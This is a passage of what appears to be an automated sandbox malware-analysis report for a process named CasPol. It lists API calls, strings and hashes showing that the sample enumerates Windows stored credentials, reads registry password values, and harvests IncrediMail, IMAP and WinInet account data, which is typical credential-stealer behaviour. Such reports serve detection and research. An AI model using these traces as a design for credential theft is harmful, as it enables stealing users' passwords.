                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                    • String ID: Creds$ps:password
                                                                                                                                                                                                                    • API String ID: 551151806-1872227768
                                                                                                                                                                                                                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 714388716-318151290
                                                                                                                                                                                                                    • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                    • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                                                                                                                                    • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                                                    • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                    • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                                    • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                    • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                                                                                    • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                    • API String ID: 3318079752-260894208
                                                                                                                                                                                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
